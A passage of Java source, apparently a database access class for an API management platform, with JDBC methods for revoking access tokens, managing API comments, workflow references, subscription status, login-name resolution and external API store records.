setPublishedDefVersion(apiId, connection, null); } connection.commit(); } catch (SQLException e) { handleException("Error while removing the API: " + apiId + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Change access token status in to revoked in database level. * * @param key API Key to be revoked * @throws APIManagementException on error in revoking access token */ public void revokeAccessToken(String key) throws APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(key, accessTokenStoreTable); Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.REMOVE_ACCESS_TOKEN_PREFIX + accessTokenStoreTable + SQLConstants .REVOKE_ACCESS_TOKEN_SUFFIX; ps = conn.prepareStatement(query); ps.setString(1, APIUtil.encryptToken(key)); ps.execute(); conn.commit(); } catch (SQLException e) { handleException("Error in revoking access token: " + e.getMessage(), e); } catch (CryptoException e) { handleException("Error in revoking access token: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * Get all applications associated with given tier * * @param tier String tier name * @return Application object array associated with tier * @throws APIManagementException on error in getting applications array */ public Application[] getApplicationsByTier(String tier) throws APIManagementException { if (tier == null) { return null; } Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATION_BY_TIER_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, tier); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("NAME"), getSubscriber(rs.getString("SUBSCRIBER_ID"))); application.setId(rs.getInt("APPLICATION_ID")); applicationsList.add(application); } Collections.sort(applicationsList, new Comparator<Application>() { public int compare(Application o1, Application o2) { return o1.getName().compareToIgnoreCase(o2.getName()); } }); applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } private void handleException(String msg, Throwable t) throws APIManagementException { log.error(msg, t); throw new APIManagementException(msg, t); } public HashMap<String, String> getURITemplatesPerAPIAsString(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; int apiId; HashMap<String, String> urlMappings = new LinkedHashMap<String, String>(); try { conn = APIMgtDBUtil.getConnection(); apiId = getAPIID(identifier, conn); String sqlQuery = SQLConstants.GET_URL_TEMPLATES_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { String script = null; String uriPattern = resultSet.getString("URL_PATTERN"); String httpMethod = resultSet.getString("HTTP_METHOD"); String authScheme = resultSet.getString("AUTH_SCHEME"); String throttlingTier = resultSet.getString("THROTTLING_TIER"); InputStream mediationScriptBlob = resultSet.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); // set null if the script is empty. Otherwise ArrayIndexOutOfBoundsException occurs when trying // to split by :: if (script.isEmpty()) { script = null; } } urlMappings.put(uriPattern + "::" + httpMethod + "::" + authScheme + "::" + throttlingTier + "::" + script, null); } } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return urlMappings; } // This should be only used only when Token Partitioning is enabled. public String getConsumerKeyForTokenWhenTokenPartitioningEnabled(String accessToken) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String accessTokenStoreTable = APIUtil.getAccessTokenStoreTableFromAccessToken(accessToken); StringBuilder authorizedDomains = new StringBuilder(); String getCKFromTokenSQL = "SELECT CONSUMER_KEY " + " FROM " + accessTokenStoreTable + " WHERE ACCESS_TOKEN = ? "; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(getCKFromTokenSQL); prepStmt.setString(1, APIUtil.encryptToken(accessToken)); rs = prepStmt.executeQuery(); boolean first = true; while (rs.next()) { String domain = rs.getString(1); if (first) { authorizedDomains.append(domain); first = false; } else { authorizedDomains.append(',').append(domain); } } } catch (SQLException e) { throw new APIManagementException("Error in retrieving access allowing domain list from table.", e); } catch (CryptoException e) { throw new APIManagementException("Error in retrieving access allowing domain list from table.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return authorizedDomains.toString(); } return null; } public String findConsumerKeyFromAccessToken(String accessToken) throws APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); Connection connection = null; PreparedStatement smt = null; ResultSet rs = null; String consumerKey = null; try { String getConsumerKeySql = SQLConstants.GET_CONSUMER_KEY_BY_ACCESS_TOKEN_PREFIX + accessTokenStoreTable + SQLConstants.GET_CONSUMER_KEY_BY_ACCESS_TOKEN_SUFFIX; connection = APIMgtDBUtil.getConnection(); smt = connection.prepareStatement(getConsumerKeySql); smt.setString(1, APIUtil.encryptToken(accessToken)); rs = smt.executeQuery(); while (rs.next()) { consumerKey = rs.getString(1); } } catch (SQLException e) { handleException("Error while getting authorized domians.", e); } catch (CryptoException e) { handleException("Error while getting authorized domians.", e); } finally { APIMgtDBUtil.closeAllConnections(smt, connection, rs); } return consumerKey; } /** * Adds a comment for an API * * @param identifier API Identifier * @param commentText Commented Text * @param user User who did the comment * @return Comment ID */ public int addComment(APIIdentifier identifier, String commentText, String user) throws APIManagementException { Connection connection = null; ResultSet resultSet = null; ResultSet insertSet = null; PreparedStatement getPrepStmt = null; PreparedStatement insertPrepStmt = null; int commentId = -1; int apiId = -1; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String getApiQuery = SQLConstants.GET_API_ID_SQL; getPrepStmt = connection.prepareStatement(getApiQuery); getPrepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); getPrepStmt.setString(2, identifier.getApiName()); getPrepStmt.setString(3, identifier.getVersion()); resultSet = getPrepStmt.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to get the API ID for: " + identifier; log.error(msg); throw new APIManagementException(msg); } /*This query to update the AM_API_COMMENTS table */ String addCommentQuery = SQLConstants.ADD_COMMENT_SQL; /*Adding data to the AM_API_COMMENTS table*/ String dbProductName = connection.getMetaData().getDatabaseProductName(); insertPrepStmt = connection.prepareStatement(addCommentQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "comment_id")}); insertPrepStmt.setString(1, commentText); insertPrepStmt.setString(2, user); insertPrepStmt.setTimestamp(3, new Timestamp(System.currentTimeMillis()), Calendar.getInstance()); insertPrepStmt.setInt(4, apiId); insertPrepStmt.executeUpdate(); insertSet = insertPrepStmt.getGeneratedKeys(); while (insertSet.next()) { commentId = Integer.parseInt(insertSet.getString(1)); } connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add comment ", e1); } } handleException("Failed to add comment data, for " + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(getPrepStmt, connection, resultSet); APIMgtDBUtil.closeAllConnections(insertPrepStmt, null, insertSet); } return commentId; } /** * Returns all the Comments on an API * * @param identifier API Identifier * @return Comment Array * @throws APIManagementException */ public Comment[] getComments(APIIdentifier identifier) throws APIManagementException { List<Comment> commentList = new ArrayList<Comment>(); Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sqlQuery = SQLConstants.GET_COMMENTS_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt.setString(2, identifier.getApiName()); prepStmt.setString(3, identifier.getVersion()); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { Comment comment = new Comment(); comment.setText(resultSet.getString("COMMENT_TEXT")); comment.setUser(resultSet.getString("COMMENTED_USER")); comment.setCreatedTime(new java.util.Date(resultSet.getTimestamp("DATE_COMMENTED").getTime())); commentList.add(comment); } } catch (SQLException e) { try { if (connection != null) { connection.rollback(); } } catch (SQLException e1) { log.error("Failed to retrieve comments ", e1); } handleException("Failed to retrieve comments for " + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return commentList.toArray(new Comment[commentList.size()]); } public boolean isContextExist(String context) { Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sql = SQLConstants.GET_API_CONTEXT_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); prepStmt.setString(1, context); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { if (resultSet.getString(1) != null) { return true; } } } catch (SQLException e) { log.error("Failed to retrieve the API Context ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public String getAPIContext(APIIdentifier identifier) throws APIManagementException { Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String context = null; String sql = SQLConstants.GET_API_CONTEXT_BY_API_NAME_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt.setString(2, identifier.getApiName()); prepStmt.setString(3, identifier.getVersion()); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { context = resultSet.getString(1); } } catch (SQLException e) { log.error("Failed to retrieve the API Context", e); handleException("Failed to retrieve the API Context for " + identifier.getProviderName() + '-' + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return context; } public List<String> getAllAvailableContexts() { List<String> contexts = new ArrayList<String>(); Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sql = SQLConstants.GET_ALL_CONTEXT_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { contexts.add(resultSet.getString("CONTEXT")); } } catch (SQLException e) { log.error("Failed to retrieve the API Context ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return contexts; } public void populateAppRegistrationWorkflowDTO(ApplicationRegistrationWorkflowDTO workflowDTO) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; Application application = null; Subscriber subscriber = null; String registrationEntry = SQLConstants.GET_APPLICATION_REGISTRATION_ENTRY_BY_SUBSCRIBER_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(registrationEntry); ps.setString(1, workflowDTO.getExternalWorkflowReference()); rs = ps.executeQuery(); while (rs.next()) { subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); application = new Application(rs.getString("NAME"), subscriber); application.setId(rs.getInt("APPLICATION_ID")); application.setApplicationWorkFlowStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setDescription(rs.getString("DESCRIPTION")); application.setTier(rs.getString("APPLICATION_TIER")); workflowDTO.setApplication(application); workflowDTO.setKeyType(rs.getString("TOKEN_TYPE")); workflowDTO.setUserName(subscriber.getName()); workflowDTO.setDomainList(rs.getString("ALLOWED_DOMAINS")); workflowDTO.setValidityTime(rs.getLong("VALIDITY_PERIOD")); OAuthAppRequest request = ApplicationUtils.createOauthAppRequest(application.getName(), null, application.getCallbackUrl(), rs .getString("TOKEN_SCOPE"), rs.getString("INPUTS"), application.getTokenType()); workflowDTO.setAppInfoDTO(request); } } catch (SQLException e) { handleException("Error occurred while retrieving an " + "Application Registration Entry for Workflow : " + workflowDTO .getExternalWorkflowReference(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } } public int getApplicationIdForAppRegistration(String workflowReference) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; int appId = -1; String registrationEntry = SQLConstants.GET_APPLICATION_REGISTRATION_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(registrationEntry); ps.setString(1, workflowReference); rs = ps.executeQuery(); while (rs.next()) { appId = rs.getInt("APP_ID"); } } catch (SQLException e) { handleException("Error occurred while retrieving an " + "Application Registration Entry for Workflow : " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return appId; } /** * Fetches WorkflowReference when given Application Name and UserId. * * @param applicationName * @param userId * @return WorkflowReference * @throws APIManagementException */ public String getWorkflowReference(String applicationName, String userId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String workflowReference = null; String sqlQuery = SQLConstants.GET_WORKFLOW_ENTRY_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setString(2, userId); rs = ps.executeQuery(); while (rs.next()) { workflowReference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application : " + applicationName + " created by " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowReference; } /** * Fetches WorkflowReference when given Application Name and UserId. * * @param applicationId * @param userId * @return WorkflowReference * @throws APIManagementException */ public String getWorkflowReferenceByApplicationId(int applicationId, String userId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String workflowReference = null; String sqlQuery = SQLConstants.GET_WORKFLOW_ENTRY_BY_APP_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, userId); rs = ps.executeQuery(); while (rs.next()) { workflowReference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application : " + applicationId + " created by " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowReference; } /** * Retries the WorkflowExternalReference for a application. * * @param appID ID of the application * @return External workflow reference for the application identified * @throws APIManagementException */ public String getExternalWorkflowReferenceByApplicationID(int appID) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, WorkflowConstants.WF_TYPE_AM_APPLICATION_CREATION); ps.setString(2, String.valueOf(appID)); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application ID : " + appID, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Remove workflow entry * * @param workflowReference * @param workflowType * @throws APIManagementException */ public void removeWorkflowEntry(String workflowReference, String workflowType) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String queryWorkflowDelete = SQLConstants.REMOVE_WORKFLOW_ENTRY_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(queryWorkflowDelete); prepStmt.setString(1, workflowType); prepStmt.setString(2, workflowReference); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting workflow entry " + workflowReference + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Retries the WorkflowExternalReference for a subscription. * * @param identifier APIIdentifier to find the subscribed api * @param appID ID of the application which has the subscription * @return External workflow reference for the subscription identified * @throws APIManagementException */ public String getExternalWorkflowReferenceForSubscription(APIIdentifier identifier, int appID) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; int apiID; int subscriptionID = -1; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_FOR_SUBSCRIPTION_SQL; String postgreSQL = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_FOR_SUBSCRIPTION_POSTGRE_SQL; try { apiID = getAPIID(identifier, conn); conn = APIMgtDBUtil.getConnection(); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { sqlQuery = postgreSQL; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiID); ps.setInt(2, appID); ps.setString(3, WorkflowConstants.WF_TYPE_AM_SUBSCRIPTION_CREATION); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Subscription : " + subscriptionID, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retries the WorkflowExternalReference for a subscription. * * @param subscriptionId ID of the subscription * @return External workflow reference for the subscription <code>subscriptionId</code> * @throws APIManagementException */ public String getExternalWorkflowReferenceForSubscription(int subscriptionId) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_FOR_SUBSCRIPTION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); // setting subscriptionId as string to prevent error when db finds string type IDs for // ApplicationRegistration workflows ps.setString(1, String.valueOf(subscriptionId)); ps.setString(2, WorkflowConstants.WF_TYPE_AM_SUBSCRIPTION_CREATION); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Subscription : " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retries the WorkflowExternalReference for an user signup by DOMAIN/username. * * @param usernameWithDomain username of the signed up user inthe format of DOMAIN/username * @return External workflow reference for the signup workflow entry * @throws APIManagementException */ public String getExternalWorkflowReferenceForUserSignup(String usernameWithDomain) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_FOR_SIGNUP_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, usernameWithDomain); ps.setString(2, WorkflowConstants.WF_TYPE_AM_USER_SIGNUP); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "User signup : " + usernameWithDomain, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retrieves IDs of pending subscriptions for a given application * * @param applicationId application id of the application * @return Set containing subscription id list * @throws APIManagementException */ public Set<Integer> getPendingSubscriptionsByApplicationId(int applicationId) throws APIManagementException { Set<Integer> pendingSubscriptions = new HashSet<Integer>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIPTIONS_BY_APPLICATION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, APIConstants.SubscriptionStatus.ON_HOLD); rs = ps.executeQuery(); while (rs.next()) { pendingSubscriptions.add(rs.getInt("SUBSCRIPTION_ID")); } } catch (SQLException e) { handleException("Error occurred while getting subscription entries for " + "Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return pendingSubscriptions; } /** * Retrieves registration workflow reference for applicationId and key type * * @param applicationId id of the application with registration * @param keyType key type of the registration * @return workflow reference of the registration * @throws APIManagementException */ public String getRegistrationWFReference(int applicationId, String keyType) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String reference = null; String sqlQuery = SQLConstants.GET_REGISTRATION_WORKFLOW_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, keyType); rs = ps.executeQuery(); // returns only one row while (rs.next()) { reference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting registration entry for " + "Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return reference; } /** * Retrives subscription status for APIIdentifier and applicationId * * @param identifier api identifier subscribed * @param applicationId application with subscription * @return subscription status * @throws APIManagementException */ public String getSubscriptionStatus(APIIdentifier identifier, int applicationId) throws APIManagementException { String status = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_SQL; try { conn = APIMgtDBUtil.getConnection(); int apiId = getAPIID(identifier, conn); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); rs = ps.executeQuery(); // returns only one row while (rs.next()) { status = rs.getString("SUB_STATUS"); } } catch (SQLException e) { handleException("Error occurred while getting subscription entry for " + "Application : " + applicationId + ", API: " + identifier, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return status; } /** * Retrieve subscription create state for APIIdentifier and applicationID * * @param identifier - api identifier which is subscribed * @param applicationId - application used to subscribed * @param connection * @return subscription create status * @throws APIManagementException */ public String getSubscriptionCreaeteStatus(APIIdentifier identifier, int applicationId, Connection connection) throws APIManagementException { String status = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_CREATION_STATUS_SQL; try { int apiId = getAPIID(identifier, connection); ps = connection.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); rs = ps.executeQuery(); // returns only one row while (rs.next()) { status = rs.getString("SUBS_CREATE_STATE"); } } catch (SQLException e) { handleException("Error occurred while getting subscription entry for " + "Application : " + applicationId + ", API: " + identifier, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return status; } private class SubscriptionInfo { private int subscriptionId; private String tierId; private int applicationId; private String accessToken; private String tokenType; } /** * Identify whether the loggedin user used his ordinal username or email * * @param userId * @return */ private boolean isUserLoggedInEmail(String userId) { return userId.contains("@"); } /** * Identify whether the loggedin user used his Primary Login name or Secondary login name * * @param userId * @return */ private boolean isSecondaryLogin(String userId) { Map<String, Map<String, String>> loginConfiguration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration().getLoginConfiguration(); if (loginConfiguration.get(APIConstants.EMAIL_LOGIN) != null) { Map<String, String> emailConf = loginConfiguration.get(APIConstants.EMAIL_LOGIN); if ("true".equalsIgnoreCase(emailConf.get(APIConstants.PRIMARY_LOGIN))) { return !isUserLoggedInEmail(userId); } if ("false".equalsIgnoreCase(emailConf.get(APIConstants.PRIMARY_LOGIN))) { return isUserLoggedInEmail(userId); } } if (loginConfiguration.get(APIConstants.USERID_LOGIN) != null) { Map<String, String> userIdConf = loginConfiguration.get(APIConstants.USERID_LOGIN); if ("true".equalsIgnoreCase(userIdConf.get(APIConstants.PRIMARY_LOGIN))) { return isUserLoggedInEmail(userId); } if ("false".equalsIgnoreCase(userIdConf.get(APIConstants.PRIMARY_LOGIN))) { return !isUserLoggedInEmail(userId); } } return false; } /** * Get the primaryLogin name using secondary login name. Primary secondary * Configuration is provided in the identitiy.xml. In the userstore, it is * users responsibility TO MAINTAIN THE SECONDARY LOGIN NAME AS UNIQUE for * each and every users. If it is not unique, we will pick the very first * entry from the userlist. * * @param login * @return * @throws APIManagementException */ private String getPrimaryLoginFromSecondary(String login) throws APIManagementException { Map<String, Map<String, String>> loginConfiguration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration().getLoginConfiguration(); String claimURI, username = null; if (isUserLoggedInEmail(login)) { Map<String, String> emailConf = loginConfiguration.get(APIConstants.EMAIL_LOGIN); claimURI = emailConf.get(APIConstants.CLAIM_URI); } else { Map<String, String> userIdConf = loginConfiguration.get(APIConstants.USERID_LOGIN); claimURI = userIdConf.get(APIConstants.CLAIM_URI); } try { RemoteUserManagerClient rmUserClient = new RemoteUserManagerClient(login); String[] user = rmUserClient.getUserList(claimURI, login); if (user.length > 0) { username = user[0]; } } catch (Exception e) { handleException("Error while retrieving the primaryLogin name using secondary loginName : " + login, e); } return username; } /** * identify the login username is primary or secondary * * @param userID * @return * @throws APIManagementException */ private String getLoginUserName(String userID) throws APIManagementException { String primaryLogin = userID; if (isSecondaryLogin(userID)) { primaryLogin = getPrimaryLoginFromSecondary(userID); } return primaryLogin; } /** * Store external APIStore details to which APIs successfully published * * @param apiId APIIdentifier * @param apiStoreSet APIStores set * @return added/failed * @throws APIManagementException */ public boolean addExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; boolean state = false; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to add external APIStores to database table String sqlQuery = SQLConstants.ADD_EXTERNAL_API_STORE_SQL; //Get API Id int apiIdentifier; apiIdentifier = getAPIID(apiId, conn); if (apiIdentifier == -1) { String msg = "Could not load API record for: " + apiId.getApiName(); log.error(msg); } ps = conn.prepareStatement(sqlQuery); for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setInt(1, apiIdentifier); ps.setString(2, store.getName()); ps.setString(3, store.getDisplayName()); ps.setString(4, store.getEndpoint()); ps.setString(5, store.getType()); ps.addBatch(); } ps.executeBatch(); conn.commit(); state = true; } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback storing external apistore details ", e1); } } log.error("Failed to store external apistore details", e); state = false; } catch (APIManagementException e) { log.error("Failed to store external apistore details", e); state = false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } return state; } /** * Delete the records of external APIStore details. * * @param apiId APIIdentifier * @param apiStoreSet APIStores set * @return added/failed * @throws APIManagementException */ public boolean deleteExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; boolean state = false; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.REMOVE_EXTERNAL_API_STORE_SQL; //Get API Id int apiIdentifier; apiIdentifier = getAPIID(apiId, conn); if (apiIdentifier == -1) { String msg = "Could not load API record for: " + apiId.getApiName(); log.error(msg); } ps = conn.prepareStatement(sqlQuery); for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setInt(1, apiIdentifier); ps.setString(2, store.getName()); ps.setString(3, store.getType()); ps.addBatch(); } ps.executeBatch(); conn.commit(); state = true; } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback deleting external apistore details ", e1); } } log.error("Failed to delete external apistore details", e); state = false; } catch (APIManagementException e) { log.error("Failed to delete external apistore details", e); state = false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } return state; } public void updateExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); updateExternalAPIStoresDetails(apiId, apiStoreSet, conn); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback updating external apistore details ", e1); } } log.error("Failed to update external apistore details", e); } catch (APIManagementException e) { log.error("Failed to updating external apistore details", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * Updateexternal APIStores details to which APIs published * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to add Application */ public void updateExternalAPIStoresDetails(APIIdentifier apiIdentifier, Set<APIStore> apiStoreSet, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; try { conn.setAutoCommit(false); //This query to add external APIStores to database table String sqlQuery = SQLConstants.UPDATE_EXTERNAL_API_STORE_SQL; ps = conn.prepareStatement(sqlQuery); //Get API Id int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); } for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setString(1, store.getEndpoint()); ps.setString(2, store.getType()); ps.setInt(3, apiId); ps.setString(4, store.getName()); ps.addBatch(); } ps.executeBatch(); ps.clearBatch(); conn.commit(); } catch (SQLException e) { log.error("Error while updating External APIStore details to the database for API : ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Return external APIStore details on successfully APIs published * * @param apiId APIIdentifier * @return Set of APIStore * @throws APIManagementException */ public Set<APIStore> getExternalAPIStoresDetails(APIIdentifier apiId) throws APIManagementException { Connection conn = null; Set<APIStore> storesSet = new HashSet<APIStore>(); try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); storesSet = getExternalAPIStoresDetails(apiId, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting external apistore details ", e1); } } log.error("Failed to get external apistore details", e); } catch (APIManagementException e) { log.error("Failed to get external apistore details", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return storesSet; } /** * Get external APIStores details which are stored in database * * @param apiIdentifier API Identifier * @throws 